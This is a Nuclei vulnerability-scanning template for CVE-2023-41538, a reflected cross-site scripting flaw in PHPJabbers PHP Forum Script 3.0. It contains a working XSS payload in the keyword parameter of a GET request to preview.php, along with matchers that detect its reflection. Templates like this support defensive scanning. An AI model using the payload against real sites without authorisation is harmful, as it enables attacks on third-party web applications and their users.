41 lines
1.5 KiB
YAML
41 lines
1.5 KiB
YAML
id: CVE-2023-41538
|
|
|
|
info:
|
|
name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
|
|
reference:
|
|
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41538
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-41538
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00109
|
|
epss-percentile: 0.43682
|
|
cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: phpjabbers
|
|
product: php_forum_script
|
|
tags: cve,cve2023,xss,phpjabber,jabber
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
|
|
condition: and
|
|
|
|
# digest: 4b0a00483046022100c153e7de3fc5ec962649164157f55fa8123a26b9e924462f95f65293f1afefbf022100d17ea68e1310bac1764e137e9a27271a5fbf490cbd1c079f17093888168ff391:922c64590222798bb761d5b6d8e72950
|